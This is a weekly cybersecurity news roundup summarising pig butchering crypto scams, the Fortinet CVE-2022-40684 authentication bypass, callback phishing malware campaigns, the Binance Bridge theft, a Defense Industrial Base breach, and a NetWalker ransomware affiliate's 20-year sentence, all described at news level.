This week’s cybersecurity bulletin covers headlines that gained attention from the cybersecurity community, extending from pig butchering crypto scams, malware drops, Fortinet vulnerabilities, cryptocurrency theft, data breaches, and ransomware affiliate getting 20 years in prison. Let us see the top cybersecurity news this week.
Pig Butchering Crypto Scams Targeting Investors
Pig butchering scams are on the rise, with threat actors using social engineering tactics to initiate romantic relationships or building up trust to pressure the victim to invest in bogus crypto schemes. The FBI (Federal Bureau of Investigation) has warned about these “Pig Butchering” cryptocurrency scams.
The threat actors use social media to scout profiles, initiate contact, and engage in long-term communication for friendship or romantic partnerships. After gaining the victim’s trust, the threat actors bring out fake investment schemes with the promise of significant rewards.
Once the victim engages in the phony scheme, the fraudsters reel them in further to squeeze out as much crypto as possible, asking them to pay income taxes, processing charges, or international transaction fees for withdrawals. Many victims were also duped into making wire transfers to accounts overseas or purchasing credit cards.
Pig Butchering scams are the latest in this week’s cybersecurity news, with Forbes sharing the story of a 52-year-old man losing $1 million in one such scam. It would be best to look out for unsolicited messages or even from those claiming to be long-lost friends or acquaintances.
Fortinet Admins Beware: Critical Auth Bypass Bug Needs Fixing
Fortinet suffered the CVE-2022-40684, a security flaw that allowed threat actors to bypass authentication on admin panels and take control of devices. After discovering the security flaw, Fortinet has advised admins to update FortiGate firewalls, FortiSwitch Manager, and FortiProxy web proxies.
The Fortinet vulnerability is critical, allowing unauthenticated threat actors to perform admin operations by accessing the admin interface using crafted HTTP or HTTPS (Hypertext Transfer Protocol Secure) requests. With over 100,000 FortiGate firewalls reachable via the web, it is a significant flaw that needs immediate attention. The Fortinet vulnerability affects various products, versions 7.0.0 to 7.0.6 and from 7.2.0 to 7.2.1 of FortiOS, versions 7.0.0 to 7.0.6 and 7.2.0 of FortiProxy, and versions 7.0.0 and 7.2.0 of FortiSwitch Manager.
Fortinet released security patches and urged customers to update all devices. However, suppose organizations are unable to download security patches. In that case, they can block these threat actors by limiting the IP (Internet Protocol) addresses that reach the admin interface by utilizing a local-in-policy.
Malware Drops via Evolving Callback Phishing Attacks
Threat actors are evolving and developing social engineering techniques, using fake subscriptions to bait individuals and posing as customer support to provide infection or hack guidance. The phishing campaign infects systems with malware loaders that drop remote access trojans, ransomware, and key loggers.
Callback phishing attacks are rising, baiting individuals with high-priced subscriptions to confuse recipients and providing numbers and emails that victims can contact to cancel the subscriptions. However, the support on the other side dupes victims and installs malware on their devices. This callback phishing campaign was discovered by Trellix and targeted the US, Canada, UK, India, China, and Japan.
The callback phishing campaign started in 2021 as BazarCall, sending subscription invoices for streaming services or medical, urging individuals to contact a phone number to cancel purchases. The recent attack baits individuals similarly with an invoice for Geek Squad, McAfee, PayPal, Norton, or Microsoft.
When the individual contacts the number, the threat actor declares no matching entries were found, convincing individuals that a malware infection is present on their system and forwarding them to a technical specialist—another threat actor then “aids” the victim and downloads malware disguised as an anti-virus.
The callback phishing campaign dropped malware that pushed ClickOnce executables when launched and installed remote access tools, allowing threat actors to perform operations on the system, install fake lock screens, and lock the victim out of the system. It would be best to watch the callback phishing campaign and cross-check all information on authentic websites.
Binance Bridge loses $566 million to Hacker
Binance Bridge lost 2 million BNB (Binance Coins), with a value of $566 million, to threat actors. The threat actor stole the sum, with their wallet receiving two transactions, with 1 million BNB each.
The CEO of Binance, Changpeng Zhao, tweeted about the incident after its discovery, pointing out that cross-chain bridge exploits of the BSC Token Hub resulted in extra Binance coins, explaining how individual’s funds are safe, and validators had suspended the BSC (Binance Smart Chain) temporarily. Most of the stolen cryptocurrency remains on the BSC and is inaccessible to the threat actor.
However, the threat actor took about $70-$80 million off-chain. Binance has been working with partners, pursuing the stolen crypto, and has already frozen an additional $7 million in off-chain funds. The attack on the BSC stirred the crypto community again, and Binance resumed all operations at 2:30 AM EST.
Following the attack, Binance apologized to its community for the incident, thanked partners and validators for aiding in securing a significant amount from the stolen $566 million, and will release a detailed report of the incident later. Binance has clarified that the exploit was the forgery of low-level proofs into a single shared library.
Data breach at the US Defense Industrial Base
The US Government suffered a data breach from state-backed hackers and stole data from the DIB (Defense Industrial Base). The threat actors used custom Covalent Stealer malware with the Impacket framework to carry out the data breach that lasted ten months.
The DIB entries contain product and service information for the deployment of military operations. Multiple threat actors were persistent in the data breach effort, utilizing CovalentStealer, Impacket collection of Python classes, remote access trojans, VPNs (Virtual Private Networks), and China Chopper web shells.
The threat actors exploited ProxyLogon vulnerabilities that were zero days at the time of the attack on the Microsoft Exchange Server used by the DIB. After initial access, the threat actors started mailbox searches, compromising admin accounts to access services for sending and receiving web service communication from clients.
Following the attack, CISA (Cybersecurity and Infrastructure Security Agency) has provided a detailed report on the Covalent Stealer malware and its resource library for encryption, decryption, and secure communications. Furthermore, CISA has also shared the details of the HyperBro RAT (Remote Access Trojan) that can download or upload files from compromised systems, log keystrokes, and bypass user account control.
20 Years in Prison for Ransomware Affiliate
Ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years and demanded $21.5 million for his cyberattacks, with 27.65 Bitcoin held by law enforcement credited towards the same.
The Canadian cybercriminal pleaded guilty in a Florida court and was sentenced considering the following charges, “Conspiracy to commit computer fraud, wire fraud, intentional damage to protected computers, and transmitting a demand about damaging protected systems.
Netwalker was a Raas (Ransomware as a service) model launched in 2019 that hired affiliates to deploy the ransomware in exchange for a share. Sebastien is believed to have conducted attacks worldwide, targeting US organizations and 17 Canadian ones, stealing corporate data and encrypting their devices, and demanding ransoms.
The Canadian threat actor was bought in on 27 January 2021 when law enforcement seized almost $800,000 and 719 Bitcoin from his address and was sentenced to 6 years and 8 months. With his current sentence of 20 years with an additional three years of supervised release, cybercriminals worldwide will realize that their attacks come with significant repercussions and the law always catches up